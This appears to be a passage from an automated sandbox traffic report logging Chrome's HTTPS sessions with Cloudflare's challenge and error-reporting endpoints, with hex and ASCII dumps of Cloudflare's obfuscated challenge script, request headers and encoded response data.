                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 63 69 61 47 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 72 57 54 43 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 72 71 69 57 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4c 5a 41 69 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 65 64 65 78 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 6b 6d 71 6b 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 69 35 28 31 31 39 39 29 5d 2c 66 3d 7b
                                                                                                                          Data Ascii: nction(h,i){return h!=i},'ciaGu':function(h,i){return h(i)},'rWTCz':function(h,i){return h*i},'rqiWX':function(h,i){return h-i},'LZAie':function(h,i){return h===i},'edexK':function(h,i){return h+i},'kmqkG':function(h,i){return h+i}},e=String[i5(1199)],f={
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 28 4d 3d 69 62 28 36 30 39 29 5b 69 62 28 37 30 32 29 5d 28 27 7c 27 29 2c 4e 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4d 5b 4e 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 43 3d 53 74 72 69 6e 67 28 4b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 69 66 28 4f 62 6a 65 63 74 5b 69 62 28 31 37 32 35 29 5d 5b 69 62 28 31 31 33 33 29 5d 5b 69 62 28 38 38 39 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 69 62 28 31 32 39 36 29 5d 28 32 35 36 2c 43 5b 69 62 28 34 36 36 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 69 62 28 31 33 32 36 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 69 62 28 31 32 32 30 29 5d 28 64 5b 69 62 28 34 34 30 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66
                                                                                                                          Data Ascii: (M=ib(609)[ib(702)]('|'),N=0;!![];){switch(M[N++]){case'0':C=String(K);continue;case'1':if(Object[ib(1725)][ib(1133)][ib(889)](B,C)){if(d[ib(1296)](256,C[ib(466)](0))){for(s=0;d[ib(1326)](s,F);H<<=1,j-1==I?(I=0,G[ib(1220)](d[ib(440)](o,H)),H=0):I++,s++);f
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 5d 28 48 2c 31 29 7c 4f 26 31 2e 34 35 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 69 62 28 31 32 32 30 29 5d 28 64 5b 69 62 28 36 33 38 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 69 62 28 31 30 36 33 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4f 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 69 62 28 31 34 37 37 29 5d 28 48 2c 31 29 7c 4f 26 31 2e 36 31 2c 64 5b 69 62 28 35 34 32 29 5d 28 49 2c 64 5b 69 62 28 31 35 34 32 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 69 62 28 31 32 32 30 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 44
                                                                                                                          Data Ascii: ](H,1)|O&1.45,j-1==I?(I=0,G[ib(1220)](d[ib(638)](o,H)),H=0):I++,O>>=1,s++);}D--,0==D&&(D=Math[ib(1063)](2,F),F++),delete B[C]}else for(O=x[C],s=0;s<F;H=d[ib(1477)](H,1)|O&1.61,d[ib(542)](I,d[ib(1542)](j,1))?(I=0,G[ib(1220)](o(H)),H=0):I++,O>>=1,s++);D--,D
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 3b 29 7b 69 66 28 49 3e 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 65 28 31 30 36 33 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 64 5b 69 65 28 31 31 39 32 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 69 65 28 31 36 36 39 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 69 65 28 31 32 30 30 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4f 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 65 28 31 30 36 33 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 69 65 28 35 31 31 29 5d 28 46 2c 4b 29 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d
                                                                                                                          Data Ascii: ;){if(I>i)return'';for(J=0,K=Math[ie(1063)](2,C),F=1;K!=F;N=d[ie(1192)](G,H),H>>=1,d[ie(1669)](0,H)&&(H=j,G=d[ie(1200)](o,I++)),J|=(0<N?1:0)*F,F<<=1);switch(O=J){case 0:for(J=0,K=Math[ie(1063)](2,8),F=1;d[ie(511)](F,K);N=H&G,H>>=1,0==H&&(H=j,G=o(I++)),J|=
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 2c 27 63 6f 64 65 27 3a 65 5b 69 68 28 31 31 36 30 29 5d 2c 27 72 63 56 27 3a 65 4d 5b 69 68 28 31 33 34 36 29 5d 5b 69 68 28 34 38 39 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 31 35 35 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 69 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 6b 3d 28 69 69 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 69 69 28 31 32 32 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 6a 5b 69 69 28 33 30 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 7c 7c 48 7d 2c 6a 5b 69 69 28 39 34 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 69 69 28 31 37 33
                                                                                                                          Data Ascii: ,'code':e[ih(1160)],'rcV':eM[ih(1346)][ih(489)]},'*'))},g)},eM[gJ(1558)]=function(g,h,i,ii,j,k,l,m,n,o,s,x,B,C,D,E,F){k=(ii=gJ,j={},j[ii(1223)]=function(G,H){return H===G},j[ii(309)]=function(G,H){return G||H},j[ii(946)]=function(G,H){return G+H},j[ii(173


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          53192.168.2.1649796104.18.95.414437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:13 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2106713247:1734621222:Ju1S4rINYs2w6jhaMJAc6wI0nSHHPD5uYn3o5b92WHs/8f48a7cc7ace41d9/.H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCK HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 3241
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          CF-Challenge: .H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCK
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:09:13 UTC3241OUTData Raw: 76 5f 38 66 34 38 61 37 63 63 37 61 63 65 34 31 64 39 3d 52 73 6e 50 49 50 7a 50 67 50 6a 50 59 50 24 2d 65 4a 2d 65 6f 45 54 6f 54 36 46 37 54 46 65 54 45 71 36 5a 54 67 71 65 25 32 62 2d 65 71 5a 75 65 55 48 50 5a 44 56 6f 48 44 49 77 73 54 4d 65 33 45 7a 5a 65 43 7a 50 65 74 39 65 46 31 4c 65 37 6d 45 65 36 6e 77 50 2b 48 65 4c 50 7a 49 6d 65 59 2d 44 46 4b 65 6b 50 78 7a 46 2d 75 58 45 65 5a 65 31 4c 75 54 41 31 38 46 72 39 42 69 2b 55 79 74 54 6b 52 34 73 58 69 54 37 6d 35 44 54 4c 65 33 73 65 71 50 44 65 67 56 79 48 79 7a 75 65 24 47 71 4b 67 52 73 6e 74 77 56 4b 74 36 45 69 4a 79 44 50 48 52 44 65 38 50 6a 30 77 74 45 44 6f 65 7a 4b 37 36 31 50 65 71 6e 6f 30 6e 61 50 49 64 61 63 51 2b 24 54 2b 65 54 69 71 6b 63 65 78 36 4a 44 4e 52 35 4b 30 56 61
                                                                                                                          Data Ascii: v_8f48a7cc7ace41d9=RsnPIPzPgPjPYP$-eJ-eoEToT6F7TFeTEq6ZTgqe%2b-eqZueUHPZDVoHDIwsTMe3EzZeCzPet9eF1Le7mEe6nwP+HeLPzImeY-DFKekPxzF-uXEeZe1LuTA18Fr9Bi+UytTkR4sXiT7m5DTLe3seqPDegVyHyzue$GqKgRsntwVKt6EiJyDPHRDe8Pj0wtEDoezK761Peqno0naPIdacQ+$T+eTiqkcex6JDNR5K0Va
                                                                                                                          2024-12-19 16:09:14 UTC747INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 19 Dec 2024 16:09:14 GMT
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Content-Length: 149560
                                                                                                                          Connection: close
                                                                                                                          cf-chl-gen: HLHdpwyJ+MdT5kjddJZsghQPPlyp2svNqnATEo6JawTzL/tVUv2f177CKzOA2FCeY1ewr8XT9TsnWtGpHFOSbZUA2LAtOwH6jZ4Ss9Yw5JbydARkHo2ekX/DNLmy3c7CcoPwcBJEOqtDzbwjdv0PmOVBvAdc6U+fFML0R9V6tzD2Ia14xzYRkxnb0vfGptgG5aGtEpp+XN4bPsDtKZCxSknrjpIZvs0kQHUZ5Cc5TyNeOriWE586MZEABpiIXxaDH9XC6plHnTqGy9PG439TJqsT+p60K8gXfUBic6BguvZsvpWO73E2TfZ9y7Cu8ACK1COR+GmpZXVPBHaS6c1WjFph1Jd1rJ9WRFPbzt1EU2HkwXaxiq8ImTagc52zCsu3PpVlKQFuAMWQfmaABoSmH2rzKFatg7kACi4rVb4P3PPewFMjs323aTUt1BtQ9qcfTv10jS5aCVf6Tnk+22Crb5tEaLUwryT8wexLreditdUlyJc=$QEX2kCAD3h2UgmXY
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8f48a7e66adb41f5-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-12-19 16:09:14 UTC622INData Raw: 72 36 71 61 6e 59 74 2f 6e 48 32 2b 70 73 57 31 6f 6f 61 44 68 4a 65 37 70 70 79 47 7a 37 4b 70 30 39 4f 31 79 5a 47 54 74 37 65 38 75 36 75 73 7a 38 48 5a 30 4e 43 67 73 72 75 30 77 4b 48 66 70 61 4f 37 77 2b 72 70 37 4e 79 39 39 4d 36 2f 39 63 7a 48 7a 4e 69 76 7a 65 2b 38 37 62 6b 43 31 4c 37 79 7a 2f 54 34 41 66 58 68 44 63 6e 4a 33 77 4c 65 2b 2b 63 44 41 4f 72 74 47 2f 41 61 44 4f 30 4c 48 68 44 77 46 75 4d 66 39 66 41 42 48 41 58 6a 47 67 67 68 49 41 49 77 48 77 34 46 43 51 41 6f 38 67 49 6e 38 7a 77 32 4e 76 63 77 4f 6a 72 30 2f 6b 49 2f 48 67 41 4a 51 42 34 4c 54 53 68 47 4f 52 41 49 4c 45 6c 43 4e 46 63 57 4a 56 5a 4d 54 54 6f 56 47 7a 63 2b 4c 7a 41 36 52 6c 68 65 4f 55 45 6c 4a 32 6b 38 5a 30 30 6f 51 6b 56 70 59 54 4a 50 4d 32 55 31 4d 48 64
                                                                                                                          Data Ascii: r6qanYt/nH2+psW1ooaDhJe7ppyGz7Kp09O1yZGTt7e8u6usz8HZ0NCgsru0wKHfpaO7w+rp7Ny99M6/9czHzNivze+87bkC1L7yz/T4AfXhDcnJ3wLe++cDAOrtG/AaDO0LHhDwFuMf9fABHAXjGgghIAIwHw4FCQAo8gIn8zw2NvcwOjr0/kI/HgAJQB4LTShGORAILElCNFcWJVZMTToVGzc+LzA6RlheOUElJ2k8Z00oQkVpYTJPM2U1MHd
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 36 4d 55 49 39 64 52 32 4e 30 64 6f 4e 33 6a 6d 75 4d 57 48 56 33 6f 61 43 4f 58 70 74 69 5a 6e 39 6b 65 6f 4b 6c 6a 5a 6d 47 67 6f 2b 6a 71 57 75 4e 6f 5a 69 41 62 34 4f 51 65 5a 53 6f 6c 33 4b 79 76 71 53 76 6a 34 5a 2f 6f 4c 71 5a 6f 38 75 34 68 59 57 4d 71 4b 36 70 77 70 37 47 73 4d 47 74 70 64 6e 55 74 64 75 77 32 61 75 67 76 37 4c 45 35 4d 47 38 30 64 32 68 35 2b 4f 2b 34 4c 6d 2b 70 4e 36 79 7a 39 66 77 30 65 6a 54 36 39 48 32 39 74 6d 2b 33 66 48 67 77 2b 44 54 33 41 4c 56 38 74 62 6a 32 67 33 65 33 51 66 37 43 65 37 6b 39 42 66 7a 37 76 44 31 38 52 30 4a 2f 41 2f 71 41 77 41 50 2f 67 4d 48 42 52 6b 44 43 43 63 74 4b 52 45 71 2b 69 6b 63 4b 67 38 70 46 2b 34 70 4b 52 7a 32 50 66 30 73 47 77 76 39 4d 52 63 66 2f 54 49 58 4f 55 6b 33 50 67 52 48 48
                                                                                                                          Data Ascii: 6MUI9dR2N0doN3jmuMWHV3oaCOXptiZn9keoKljZmGgo+jqWuNoZiAb4OQeZSol3KyvqSvj4Z/oLqZo8u4hYWMqK6pwp7GsMGtpdnUtduw2augv7LE5MG80d2h5+O+4Lm+pN6yz9fw0ejT69H29tm+3fHgw+DT3ALV8tbj2g3e3Qf7Ce7k9Bfz7vD18R0J/A/qAwAP/gMHBRkDCCctKREq+ikcKg8pF+4pKRz2Pf0sGwv9MRcf/TIXOUk3PgRHH
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 4a 55 6c 42 78 62 35 4b 46 55 46 32 4b 58 70 61 63 6c 58 64 77 6c 59 6d 52 6c 71 47 70 70 5a 61 69 70 57 35 72 72 36 79 48 6b 4b 68 71 6d 62 65 36 6d 37 4f 49 69 4a 4f 36 76 71 4e 2b 6d 6e 33 45 6b 38 4b 6b 75 70 75 5a 72 72 37 49 73 6f 6a 46 71 74 57 6a 79 64 61 34 31 4d 65 55 32 35 61 62 79 61 37 43 72 4b 50 52 31 4e 48 59 36 72 57 69 34 4d 48 44 32 62 79 39 71 63 72 75 37 2b 6a 33 73 4f 76 78 37 2b 6a 75 38 62 76 31 31 50 7a 79 37 74 76 67 35 4f 58 6e 2b 2f 67 47 32 39 62 4e 34 74 33 38 7a 41 6e 56 79 4f 77 57 47 2b 63 45 31 52 62 57 32 52 62 5a 2f 69 50 64 2b 41 51 41 45 2f 58 30 2f 68 6a 6b 42 79 6e 2b 4c 51 6a 2b 45 52 38 67 38 51 49 70 45 76 4d 4e 4b 76 55 41 46 76 73 6a 4f 52 6f 77 4a 78 59 5a 43 53 77 45 44 54 34 33 48 78 34 73 4d 46 56 4a 4e 79
                                                                                                                          Data Ascii: JUlBxb5KFUF2KXpaclXdwlYmRlqGppZaipW5rr6yHkKhqmbe6m7OIiJO6vqN+mn3Ek8KkupuZrr7IsojFqtWjyda41MeU25abya7CrKPR1NHY6rWi4MHD2by9qcru7+j3sOvx7+ju8bv11Pzy7tvg5OXn+/gG29bN4t38zAnVyOwWG+cE1RbW2RbZ/iPd+AQAE/X0/hjkByn+LQj+ER8g8QIpEvMNKvUAFvsjORowJxYZCSwEDT43Hx4sMFVJNy
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 62 4a 78 75 6a 59 35 7a 67 35 68 6c 70 61 47 64 70 4b 52 2b 71 49 56 70 61 35 36 61 66 49 71 30 63 35 57 35 6b 4b 79 31 69 62 43 4d 76 72 69 4a 77 5a 4b 44 75 35 4b 31 67 71 4f 59 6e 61 75 45 78 64 43 61 6b 4d 66 4d 31 4c 43 70 32 4d 65 79 6a 4c 53 76 30 61 72 64 31 4c 72 64 6f 4c 4c 54 7a 39 47 36 79 62 75 35 79 4f 66 61 36 2b 4f 37 76 37 2f 46 78 4c 48 48 73 4d 57 34 34 2f 54 58 38 50 62 74 32 66 7a 76 34 41 66 6e 76 64 50 49 78 4e 6f 4f 36 66 66 4a 2b 75 72 70 79 2b 51 4d 7a 64 59 59 43 66 4c 70 33 4f 33 30 43 66 54 72 41 66 6e 36 47 2b 54 36 49 53 45 69 49 42 63 67 47 50 6f 6e 4d 43 45 76 44 77 41 6d 37 52 6b 4c 2b 68 67 63 4e 67 6a 34 4c 44 73 51 2b 7a 41 55 47 50 34 30 4b 69 41 4b 4f 55 4d 33 4b 7a 6f 2f 48 6a 41 4d 46 53 59 7a 45 53 31 56 55 52 73
                                                                                                                          Data Ascii: bJxujY5zg5hlpaGdpKR+qIVpa56afIq0c5W5kKy1ibCMvriJwZKDu5K1gqOYnauExdCakMfM1LCp2MeyjLSv0ard1LrdoLLTz9G6ybu5yOfa6+O7v7/FxLHHsMW44/TX8Pbt2fzv4AfnvdPIxNoO6ffJ+urpy+QMzdYYCfLp3O30CfTrAfn6G+T6ISEiIBcgGPonMCEvDwAm7RkL+hgcNgj4LDsQ+zAUGP40KiAKOUM3Kzo/HjAMFSYzES1VURs
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 34 56 2f 6d 58 78 6f 67 4a 36 4a 6f 34 65 69 6a 61 57 4a 61 35 47 51 6a 4b 6d 5a 6c 59 79 56 74 35 4b 47 6e 48 6d 54 77 6e 6d 61 77 73 47 68 67 36 6a 44 74 73 53 32 69 73 2b 37 78 62 2b 37 77 59 32 55 6b 4b 66 55 6d 74 7a 4c 6c 62 6d 37 76 61 6e 43 32 37 61 7a 73 64 53 6a 6f 62 33 4c 36 39 6e 4d 36 50 48 49 37 75 32 79 30 76 4c 79 35 63 79 79 39 66 48 55 39 63 66 5a 38 39 51 45 32 66 33 30 31 67 4d 48 33 65 54 48 34 75 54 59 79 2f 76 6d 37 63 76 2b 37 67 6a 6c 34 75 51 48 39 64 33 56 39 41 6b 59 48 68 4c 6a 2f 75 34 43 48 79 72 7a 47 51 54 6e 44 41 77 43 45 51 73 31 4e 42 55 4e 4b 68 6e 33 46 51 67 4e 4f 52 55 4e 4c 77 6f 52 47 69 55 6a 2f 42 73 78 51 45 45 74 52 54 68 4b 43 7a 6c 49 54 67 39 46 51 56 49 57 4a 30 52 54 4c 79 34 39 54 7a 4d 38 49 56 4e 59
                                                                                                                          Data Ascii: 4V/mXxogJ6Jo4eijaWJa5GQjKmZlYyVt5KGnHmTwnmawsGhg6jDtsS2is+7xb+7wY2UkKfUmtzLlbm7vanC27azsdSjob3L69nM6PHI7u2y0vLy5cyy9fHU9cfZ89QE2f301gMH3eTH4uTYy/vm7cv+7gjl4uQH9d3V9AkYHhLj/u4CHyrzGQTnDAwCEQs1NBUNKhn3FQgNORUNLwoRGiUj/BsxQEEtRThKCzlITg9FQVIWJ0RTLy49TzM8IVNY
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 78 2f 6f 70 61 65 71 71 53 4b 6a 62 4f 4e 69 48 56 79 68 71 61 4b 68 62 65 63 73 34 6d 69 72 4a 61 75 6b 59 61 65 71 5a 4b 68 6d 4a 32 74 71 61 36 68 70 71 2f 46 6f 4e 48 51 30 64 4f 58 72 63 7a 5a 32 39 61 58 30 5a 32 39 73 4d 7a 55 32 65 61 6f 71 4e 4f 35 71 61 6e 74 77 2b 6e 4a 71 74 2f 74 30 76 66 77 37 4c 4c 49 73 74 44 59 39 66 44 57 30 63 48 4e 7a 73 36 2b 32 38 59 4c 38 73 6a 35 78 4e 66 58 2b 42 45 4d 35 65 59 4d 44 50 66 71 42 52 49 56 36 73 38 56 33 52 33 30 38 52 77 66 4a 2f 77 67 46 79 45 4b 2b 52 63 4a 49 4f 34 67 37 53 77 79 4e 69 44 79 4b 54 45 55 49 77 30 54 45 78 4d 33 4d 79 4e 43 4e 42 63 53 49 7a 41 58 4e 78 67 63 53 68 30 65 4a 44 49 2b 4b 69 59 48 45 53 64 49 47 43 55 6d 53 56 59 79 53 54 38 35 51 44 6b 39 51 44 59 32 59 57 68 69 59
                                                                                                                          Data Ascii: x/opaeqqSKjbONiHVyhqaKhbecs4mirJaukYaeqZKhmJ2tqa6hpq/FoNHQ0dOXrczZ29aX0Z29sMzU2eaoqNO5qantw+nJqt/t0vfw7LLIstDY9fDW0cHNzs6+28YL8sj5xNfX+BEM5eYMDPfqBRIV6s8V3R308RwfJ/wgFyEK+RcJIO4g7SwyNiDyKTEUIw0TExM3MyNCNBcSIzAXNxgcSh0eJDI+KiYHESdIGCUmSVYyST85QDk9QDY2YWhiY
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 76 68 47 36 43 72 61 4f 45 6b 35 56 33 6a 36 71 65 73 71 36 30 65 71 32 2f 66 37 76 48 77 63 4f 4b 76 70 65 58 6f 36 4f 47 67 38 4b 2f 7a 5a 4b 66 7a 39 69 51 7a 36 61 30 7a 64 75 35 73 5a 2b 62 72 64 4c 4e 31 72 2b 6d 77 62 36 71 71 4b 58 74 34 4e 44 72 33 2b 57 38 35 50 66 69 35 2b 7a 5a 79 65 76 72 79 76 33 5a 38 39 62 51 77 76 50 4f 78 38 54 57 2f 51 44 74 37 68 41 4b 45 4f 6b 45 43 65 4c 6e 36 39 4c 78 30 41 54 62 37 2f 7a 30 46 53 41 58 45 42 54 78 4a 68 55 64 33 2b 4c 37 46 43 30 6d 44 42 6e 38 44 52 48 76 2f 68 58 2b 45 51 45 73 44 69 73 79 4e 78 73 37 44 2f 76 38 46 78 45 37 52 43 46 46 47 78 55 6c 4a 6a 73 77 4f 68 45 61 51 43 41 32 49 69 63 50 4d 42 59 6a 45 31 49 65 55 6a 34 5a 46 44 56 43 57 31 73 6a 58 7a 31 56 4e 54 6c 4b 4f 7a 34 2b 4d 47
                                                                                                                          Data Ascii: vhG6CraOEk5V3j6qesq60eq2/f7vHwcOKvpeXo6OGg8K/zZKfz9iQz6a0zdu5sZ+brdLN1r+mwb6qqKXt4NDr3+W85Pfi5+zZyevryv3Z89bQwvPOx8TW/QDt7hAKEOkECeLn69Lx0ATb7/z0FSAXEBTxJhUd3+L7FC0mDBn8DRHv/hX+EQEsDisyNxs7D/v8FxE7RCFFGxUlJjswOhEaQCA2IicPMBYjE1IeUj4ZFDVCW1sjXz1VNTlKOz4+MG
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 6f 36 69 6e 62 71 61 36 66 71 2b 78 6a 71 79 66 76 71 37 42 79 4b 58 4c 68 4d 79 62 70 73 58 4b 79 4d 53 67 79 38 48 58 77 71 65 7a 31 38 54 63 6a 39 71 65 6d 61 43 5a 7a 4b 48 65 76 65 53 79 35 71 58 46 74 63 53 73 32 36 72 63 33 39 36 75 37 38 61 32 30 4d 75 7a 74 66 6a 53 36 74 54 61 30 65 72 51 2f 72 77 41 42 73 54 6d 2b 74 58 74 2b 65 33 34 43 65 44 39 44 2b 62 74 46 39 44 52 34 2f 4c 57 7a 75 58 63 49 42 59 6a 2b 39 2f 39 47 41 55 6a 35 76 67 72 41 4f 76 35 4a 42 34 53 49 77 58 76 41 78 49 6c 39 44 6e 77 4b 6a 45 4b 39 66 62 2b 48 42 39 42 4c 54 34 6a 52 42 77 35 42 6b 70 47 4a 30 74 4b 45 42 34 51 52 55 68 46 4d 55 67 68 54 30 6f 70 53 31 73 59 4d 6c 49 5a 51 6a 64 58 48 7a 4a 65 59 6b 4d 39 57 53 74 6e 58 44 31 50 4c 6c 46 6e 4c 6a 45 31 61 56 6c
                                                                                                                          Data Ascii: o6inbqa6fq+xjqyfvq7ByKXLhMybpsXKyMSgy8HXwqez18Tcj9qemaCZzKHeveSy5qXFtcSs26rc396u78a20MuztfjS6tTa0erQ/rwABsTm+tXt+e34CeD9D+btF9DR4/LWzuXcIBYj+9/9GAUj5vgrAOv5JB4SIwXvAxIl9DnwKjEK9fb+HB9BLT4jRBw5BkpGJ0tKEB4QRUhFMUghT0opS1sYMlIZQjdXHzJeYkM9WStnXD1PLlFnLjE1aVl
                                                                                                                          2024-12-19 16:09:14 UTC1369INData Raw: 71 36 4e 6a 33 57 75 68 63 57 2b 67 35 2f 48 78 4d 75 74 69 74 43 63 30 61 37 50 72 4a 44 46 77 73 43 6f 70 5a 4f 6b 6c 39 76 4a 7a 39 2f 42 77 65 4f 66 34 65 58 55 35 39 62 65 71 63 44 67 33 2b 4c 6b 77 2b 53 39 30 73 37 44 75 50 50 59 78 62 50 39 36 2b 37 4a 75 4e 7a 4d 30 2b 48 43 37 38 62 48 38 39 72 6c 35 74 34 47 43 63 38 44 43 74 7a 2b 31 73 33 67 44 4f 38 56 44 68 66 61 48 4f 77 4e 33 50 6a 65 39 42 37 5a 2b 51 62 69 46 51 67 61 42 79 41 43 37 51 73 69 4a 76 41 30 44 44 55 56 46 66 6b 30 4f 68 54 39 4d 68 59 74 50 50 37 37 4b 42 68 4a 4a 42 6f 35 44 44 59 61 54 45 6c 43 4d 43 64 41 4c 52 51 30 53 30 78 53 47 52 78 4a 48 6a 6c 43 54 52 38 63 57 53 49 35 57 54 63 32 56 79 63 2b 4b 6d 42 41 59 69 31 54 50 55 4a 51 59 31 5a 55 59 6d 4e 48 58 6e 51 2b
                                                                                                                          Data Ascii: q6Nj3WuhcW+g5/HxMutitCc0a7PrJDFwsCopZOkl9vJz9/BweOf4eXU59beqcDg3+Lkw+S90s7DuPPYxbP96+7JuNzM0+HC78bH89rl5t4GCc8DCtz+1s3gDO8VDhfaHOwN3Pje9B7Z+QbiFQgaByAC7QsiJvA0DDUVFfk0OhT9MhYtPP77KBhJJBo5DDYaTElCMCdALRQ0S0xSGRxJHjlCTR8cWSI5WTc2Vyc+KmBAYi1TPUJQY1ZUYmNHXnQ+


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          54192.168.2.164979735.190.80.14437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:09:14 UTC541OUTOPTIONS /report/v4?s=wnW%2BGYblX0Kzjphj1%2F0sP%2BY%2FLrMq%2FJuzzxlY%2FXCUapaLm0ujBdHHn0RySUC68qWD4tqzWYDFrUcvc1NMsLhZGdmyw8pFXgJqiM2S1qDotNZyr5WlboOoTG0necTOLg%3D%3D HTTP/1.1
                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Origin: https://wv.itzraterbi.ru
